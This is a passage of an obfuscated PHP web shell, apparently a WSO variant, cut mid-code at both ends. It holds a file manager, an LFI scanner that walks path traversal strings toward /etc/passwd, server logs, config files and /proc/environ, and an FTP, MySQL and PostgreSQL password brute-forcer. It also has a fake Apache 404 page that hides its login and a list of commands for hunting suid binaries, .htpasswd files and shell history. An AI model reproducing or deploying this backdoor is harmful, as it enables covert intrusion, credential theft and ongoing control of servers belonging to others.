urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>\xa <input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>\xa <input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if (class_exists("ZipArchive")) { echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; } echo "<option value='tar'>Compress (tar.gz)</option>"; if (!empty($_SESSION["act"]) && @count($_SESSION["f"])) { echo "<option value='paste'>Paste / Compress</option>"; } echo "</select> "; if (!empty($_SESSION["act"]) && @count($_SESSION["f"]) && ($_SESSION["act"] == "zip" || $_SESSION["act"] == "tar")) { echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_SESSION["act"] == "zip" ? "zip" : "tar.gz") . "'> "; } echo "<input type='submit' value='>>'></td></tr></form></table></div>"; wsoFooter(); } goto T8b3I; MG4ce: function actionlfiscan() { wsoHeader(); print "
<h3>Led-Zeppelin's LFI File dumper</h3>
\xa <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
<option value="1">
Access Log\xa </option>\xa \xa <option value="2">\xa httpd.conf\xa </option>
\xa <option value="3">
Error Log
</option>
<option value="4">
php.ini
</option>\xa <option value="5">\xa MySQL
</option>
<option value="6">\xa FTP
</option>\xa <option value="7">
Environ
</option>
</select> Null: <select name="null">\xa <option value="%00">
Yes
</option>
<option value="">\xa No
</option>
</select> User-Agent: <input type="text" size="20" name="custom_header" value="">\xa </form>"; error_reporting(0); if ($_POST["lfiurl"]) { print "<pre>"; $cheader = $_POST["custom_header"]; $target = $_POST["lfiurl"]; $type = $_POST["scantype"]; $byte1 = $_POST["null"]; $lfitest = "../../../../../../../../../../../../../../etc/passwd" . $byte1 . ''; $lfitest2 = "../../../../../../../../../../../../../../fake/file" . $byte1 . ''; $lfiprocenv = "../../../../../../../../../../../../../../proc/environ" . $byte1 . ''; $lfiaccess = array(1 => "../../../../../../../../../../../../../../apache/logs/access.log" . $byte1 . '', 2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log" . $byte1 . '', 3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log" . $byte1 . '', 4 => "../../../../../../../../../../../../../../var/www/logs/access_log" . $byte1 . '', 5 => "../../../../../../../../../../../../../../var/www/logs/access.log" . $byte1 . '', 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log" . $byte1 . '', 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log" . $byte1 . '', 8 => "../../../../../../../../../../../../../../var/log/apache/access_log" . $byte1 . '', 9 => "../../../../../../../../../../../../../../var/log/apache2/access_log" . $byte1 . '', 10 => "../../../../../../../../../../../../../../var/log/apache/access.log" . $byte1 . '', 11 => "../../../../../../../../../../../../../../var/log/apache2/access.log" . $byte1 . '', 12 => "../../../../../../../../../../../../../../var/log/access_log" . $byte1 . '', 13 => "../../../../../../../../../../../../../../var/log/access.log" . $byte1 . '', 14 => "../../../../../../../../../../../../../../var/log/httpd/access_log" . $byte1 . '', 15 => "../../../../../../../../../../../../../../apache2/logs/access.log" . $byte1 . '', 16 => "../../../../../../../../../../../../../../logs/access.log" . $byte1 . '', 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log" . $byte1 . '', 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log" . $byte1 . '', 19 => "../../../../../../../../../../../../../../var/log/httpd/access.log" . $byte1 . '', 20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log" . $byte1 . '', 21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log" . $byte1 . '', 22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log" . $byte1 . '', 23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log" . $byte1 . ''); $lfierror = array(1 => "../../../../../../../../../../../../../../apache/logs/error.log" . $byte1 . '', 2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log" . $byte1 . '', 3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log" . $byte1 . '', 4 => "../../../../../../../../../../../../../../var/www/logs/error_log" . $byte1 . '', 5 => "../../../../../../../../../../../../../../var/www/logs/error.log" . $byte1 . '', 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log" . $byte1 . '', 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log" . $byte1 . '', 8 => "../../../../../../../../../../../../../../var/log/apache/error_log" . $byte1 . '', 9 => "../../../../../../../../../../../../../../var/log/apache2/error_log" . $byte1 . '', 10 => "../../../../../../../../../../../../../../var/log/apache/error.log" . $byte1 . '', 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log" . $byte1 . '', 12 => "../../../../../../../../../../../../../../var/log/error_log" . $byte1 . '', 13 => "../../../../../../../../../../../../../../var/log/error.log" . $byte1 . '', 14 => "../../../../../../../../../../../../../../var/log/httpd/error_log" . $byte1 . '', 15 => "../../../../../../../../../../../../../../apache2/logs/error.log" . $byte1 . '', 16 => "../../../../../../../../../../../../../../logs/error.log" . $byte1 . '', 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log" . $byte1 . '', 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log" . $byte1 . '', 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log" . $byte1 . '', 20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log" . $byte1 . '', 21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log" . $byte1 . '', 22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log" . $byte1 . '', 23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log" . $byte1 . ''); $lficonfig = array(1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf" . $byte1 . '', 2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf" . $byte1 . '', 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf" . $byte1 . '', 4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf" . $byte1 . '', 5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf" . $byte1 . '', 6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf" . $byte1 . '', 7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf" . $byte1 . '', 8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf" . $byte1 . '', 9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf" . $byte1 . '', 10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf" . $byte1 . '', 11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf" . $byte1 . '', 12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf" . $byte1 . '', 13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf" . $byte1 . '', 14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf" . $byte1 . '', 15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf" . $byte1 . '', 16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf" . $byte1 . '', 17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf" . $byte1 . '', 18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf" . $byte1 . '', 19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf" . $byte1 . '', 20 => "../../../../../../../../../../../../../../../etc/httpd.conf" . $byte1 . '', 21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf" . $byte1 . '', 22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf" . $byte1 . '', 23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf" . $byte1 . '', 24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf" . $byte1 . '', 25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default" . $byte1 . '', 26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf" . $byte1 . '', 27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf" . $byte1 . '', 28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default" . $byte1 . '', 29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php" . $byte1 . '', 30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php" . $byte1 . '', 31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php" . $byte1 . '', 32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf" . $byte1 . '', 33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf" . $byte1 . '', 34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf" . $byte1 . '', 35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf" . $byte1 . ''); $lfiphpini = array(1 => "../../../../../../../../../../../../../../../etc/php.ini" . $byte1 . '', 2 => "../../../../../../../../../../../../../../../bin/php.ini" . $byte1 . '', 3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini" . $byte1 . '', 4 => "../../../../../../../../../../../../../../../usr/lib/php.ini" . $byte1 . '', 5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini" . $byte1 . '', 6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini" . $byte1 . '', 7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini" . $byte1 . '', 8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini" . $byte1 . '', 9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini" . $byte1 . '', 10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini" . $byte1 . '', 11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini" . $byte1 . '', 12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini" . $byte1 . '', 13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini" . $byte1 . '', 14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini" . $byte1 . '', 15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini" . $byte1 . '', 16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini" . $byte1 . '', 17 => "../../../../../../../../../../../../../../../etc/php/php.ini" . $byte1 . '', 18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini" . $byte1 . '', 19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini" . $byte1 . '', 20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini" . $byte1 . '', 21 => "../../../../../../../../../../../../../../../web/conf/php.ini" . $byte1 . '', 22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini" . $byte1 . '', 23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini" . $byte1 . '', 24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini" . $byte1 . '', 25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini" . $byte1 . '', 26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini" . $byte1 . '', 27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini" . $byte1 . ''); $lfimysql = array(1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log" . $byte1 . '', 2 => "../../../../../../../../../../../../../../../var/log/mysql.log" . $byte1 . '', 3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log" . $byte1 . '', 4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log" . $byte1 . '', 5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log" . $byte1 . '', 6 => "../../../../../../../../../../../../../../../var/mysql.log" . $byte1 . '', 7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf" . $byte1 . '', 8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf" . $byte1 . '', 9 => "../../../../../../../../../../../../../../../var/log/mysqld.log" . $byte1 . '', 10 => "../../../../../../../../../../../../../../../etc/my.cnf" . $byte1 . ''); $lfiftp = array(1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd" . $byte1 . '', 2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log" . $byte1 . '', 3 => "../../../../../../../../../../../../../../../var/log/proftpd" . $byte1 . '', 4 => "../../../../../../../../../../../../../../../etc/proftp.conf" . $byte1 . '', 5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf" . $byte1 . '', 6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf" . $byte1 . '', 7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf" . $byte1 . '', 8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log" . $byte1 . '', 9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list" . $byte1 . '', 10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log" . $byte1 . '', 11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf" . $byte1 . '', 12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf" . $byte1 . '', 13 => "../../../../../../../../../../../../../../../etc/chrootUsers" . $byte1 . '', 14 => "../../../../../../../../../../../../../../../var/log/xferlog" . $byte1 . '', 15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog" . $byte1 . '', 16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess" . $byte1 . '', 17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts" . $byte1 . '', 18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers" . $byte1 . '', 19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl" . $byte1 . '', 20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf" . $byte1 . '', 21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf" . $byte1 . '', 22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf" . $byte1 . '', 23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb" . $byte1 . '', 24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb" . $byte1 . '', 25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl" . $byte1 . '', 26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf" . $byte1 . '', 27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf" . $byte1 . '', 28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb" . $byte1 . '', 29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb" . $byte1 . '', 30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd" . $byte1 . '', 31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb" . $byte1 . '', 32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/" . $byte1 . '', 33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/" . $byte1 . '', 34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/" . $byte1 . '', 35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/" . $byte1 . '', 36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log" . $byte1 . '', 37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log" . $byte1 . '', 38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log" . $byte1 . '', 39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log" . $byte1 . '', 40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy" . $byte1 . '', 41 => "../../../../../../../../../../../../../../../var/log/ftplog" . $byte1 . '', 42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp" . $byte1 . '', 43 => "../../../../../../../../../../../../../../../etc/ftpchroot" . $byte1 . '', 44 => "../../../../../../../../../../../../../../../etc/ftphosts" . $byte1 . ''); $x = 1; if ($type == 1) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "<font color='green'>[+] Exploitable!</font> <a href="" . $target . '' . $lfitest . "">" . $target . '' . $lfitest . "</a><br />"; while ($lfiaccess[$x]) { $res3 = FetchURL($target . $lfiaccess[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "<font color='green'>[+] File detected!</font> <a href="" . $target . '' . $lfiaccess[$x] . "">" . $target . '' . $lfiaccess[$x] . "</a><br />"; } else { print "<font color='red'>[!] Failed!</font>" . $target . '' . $lfiaccess[$x] . "<br />"; } $x++; } } } if ($type == 2) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "<font color='green'>[+] Exploitable!</font> <a href="" . $target . '' . $lfitest . "">" . $target . '' . $lfitest . "</a><br />"; while ($lficonfig[$x]) { $res3 = FetchURL($target . $lficonfig[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "<font color='green'>[+] File detected!</font> <a href="" . $target . '' . $lficonfig[$x] . "">" . $target . '' . $lficonfig[$x] . "</a><br />"; } else { print "<font color='red'>[!] Failed!</font>" . $target . '' . $lficonfig[$x] . "<br />"; } $x++; } } } if ($type == 3) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "<font color='green'>[+] Exploitable!</font> <a href="" . $target . '' . $lfitest . "">" . $target . '' . $lfitest . "</a><br />"; while ($lfierror[$x]) { $res3 = FetchURL($target . $lfierror[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "<font color='green'>[+] File detected!</font> <a href="" . $target . '' . $lfierror[$x] . "">" . $target . '' . $lfierror[$x] . "</a><br />"; } else { print "<font color='red'>[!] Failed!</font>" . $target . '' . $lfierror[$x] . "<br />"; } $x++; } } } if ($type == 4) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "<font color='green'>[+] Exploitable!</font> <a href="" . $target . '' . $lfitest . "">" . $target . '' . $lfitest . "</a><br />"; while ($lfiphpini[$x]) { $res3 = FetchURL($target . $lfiphpini[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "<font color='green'>[+] File detected!</font> <a href="" . $target . '' . $lfiphpini[$x] . "">" . $target . '' . $lfiphpini[$x] . "</a><br />"; } else { print "<font color='red'>[!] Failed!</font>" . $target . '' . $lfiphpini[$x] . "<br />"; } $x++; } } } if ($type == 5) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "<font color='green'>[+] Exploitable!</font> <a href="" . $target . '' . $lfitest . "">" . $target . '' . $lfitest . "</a><br />"; while ($lfimysql[$x]) { $res3 = FetchURL($target . $lfimysql[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "<font color='green'>[+] File detected!</font> <a href="" . $target . '' . $lfimysql[$x] . "">" . $target . '' . $lfimysql[$x] . "</a><br />"; } else { print "<font color='red'>[!] Failed!</font>" . $target . '' . $lfimysql[$x] . "<br />"; } $x++; } } } if ($type == 6) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "<font color='green'>[+] Exploitable!</font> <a href="" . $target . '' . $lfitest . "">" . $target . '' . $lfitest . "</a><br />"; while ($lfiftp[$x]) { $res3 = FetchURL($target . $lfiftp[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "<font color='green'>[+] File detected!</font> <a href="" . $target . '' . $lfiftp[$x] . "">" . $target . '' . $lfiftp[$x] . "</a><br />"; } else { print "<font color='red'>[!] Failed!</font>" . $target . '' . $lfiftp[$x] . "<br />"; } $x++; } } } if ($type == 7) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "<font color='green'>[+] Exploitable!</font> <a href="" . $target . '' . $lfitest . "">" . $target . '' . $lfitest . "</a><br />"; $res3 = FetchURL($target . $lfiprocenv); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "<font color='green'>[+] File detected!</font> <a href="" . $target . '' . $lfiprocenv . "">" . $target . '' . $lfiprocenv . "</a><br />"; } else { print "<font color='red'>[!] Failed!</font>" . $target . '' . $lfiprocenv . "<br />"; } } } } wsoFooter(); } goto Ejazf; FF3fF: $safe_mode = @ini_get("safe_mode"); goto E2gkR; X2GR2: if ($_POST["query"]) { $veriyfy = stripslashes(stripslashes($_POST["query"])); $data = "data.txt"; @touch("data.txt"); $ver = @fopen($data, "w"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("data.txt", "r"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto uKoLR; v_sDF: function wsoLogin() { die("<h1>Not Found</h1>\xa<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>\xa<hr>\xa<address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80</address>
<style>\xa input { margin:0;background-color:#fff;border:1px solid #fff; }\xa </style>
<pre align=center>\xa <form method=post>
<input type=password name=pass>\xa </form></pre>"); } goto ktSrM; UbTi2: @ini_set("max_execution_time", 0); goto KTxg3; E2gkR: if (!$safe_mode) { error_reporting(0); } goto B4ijc; dbSML: if ($os == "win") { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => '', "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto kwWV5; B4ijc: $disable_functions = @ini_get("disable_functions"); goto QwM1y; KTxg3: @set_time_limit(0); goto HrH07; SKJBT: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto lpEk_; iAJkS: $time_shell = '' . date("d/m/Y - H:i:s") . ''; goto Yc43E; cwENR: function actionBruteforce() { wsoHeader(); if (isset($_POST["proto"])) { echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; if ($_POST["proto"] == "ftp") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["proto"] == "mysql") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . ":" . $port ? $port : 3306, $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["proto"] == "pgsql") { function bruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST["server"]); if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode(":", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } if (@$_POST["reverse"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } } } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } } } } echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; } echo "<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>" . "<input type=hidden name=c value="" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value="" . htmlspecialchars($_POST["a"]) . "">" . "<input type=hidden name=charset value="" . htmlspecialchars($_POST["charset"]) . "">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value="127.0.0.1"></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>" . "<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>" . "<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>" . "<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value="" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>"; echo "</div><br>"; wsoFooter(); } goto xBzDj; u3Alk: function wsoFooter() { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='#25ff00'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "
</div>\xa<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\xa </tr><tr>\xa <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>\xa <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
